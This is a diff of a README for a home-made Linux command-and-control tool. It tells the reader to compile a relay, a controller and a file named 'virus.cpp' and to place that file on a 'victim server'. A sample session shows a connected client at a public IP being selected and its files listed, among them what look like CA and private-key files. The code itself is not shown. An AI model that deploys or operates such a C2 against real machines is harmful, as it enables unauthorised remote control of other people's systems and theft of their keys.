hr0g/C2/README.md

 Linux Server C2 Controller

-Different version of Linux may rely on different .so files to link, thus I don't put certain version of executable here, please compile these 3 code manually
+Step 1:

-Step 1: Replace the ip address "192.168.80.132" in the tcsl.cpp and host.cpp
+Replace the ip address "192.168.80.132" in the tcsl.cpp and host.cpp as your server ipv4 address

+Step 2:
-Step 2: Copy all the codes, tcsl.cpp to your Linux Server, virus.cpp to your victim server, host.cpp to your local machine as control side, and then compile:
+Copy tcsl.cpp to your Linux Server virus.cpp to your victim server host.cpp to your local machine as control side and then compile:

 g++ tcsl.cpp -o tcsl
 g++ host.cpp -o host
 g++ virus.cpp -o server

+Step 3:
-Step 3: Open 3 terminals and run the command seperately:
+Open 3 terminals and run the command seperately:
 ./tcsl
-And then you can run any amounts of Clients or Host with newly open up terminal the Host is config as the last connected, after the server has been opened, you can lauch the host or client first either way ./virus
+Support any amounts of Clients' connections the Host and Client is auto-recognized:
+./virus
 ./host

+Step 4:
+Please use 'hs' followed with the client numbers you pick.
+For example: 'hs 1'
+Use 'hh' to check the connected clients.

+Step 5:
-Step 4: Enjoy your commands in the host terminal, it would reply the result send by you, for example:
+Enjoy your commands in the host terminal and control your client as terminal.

-┌──(root㉿kali)-[/home/kali/Desktop]

-└─# ./host
+For example:
 Connected to the server.
+No client connected.
 ┌──(root♪hr0g) - [~]

+└─# ls
+Please use 'hs' followed with the client numbers you pick.

+For example: 'hs 1'

+Use 'hh' to check the connected clients.
+┌──(root♪hr0g) - [~]

+└─# hh

+Client 1:  Ip: 223.104.76.166

+┌──(root♪hr0g) - [~]

+└─# hs 1
+Client 1 selected.
+┌──(root♪hr0g) - [~1]

 └─# ls 1

 ca.crt
 ca.key
 dh.pem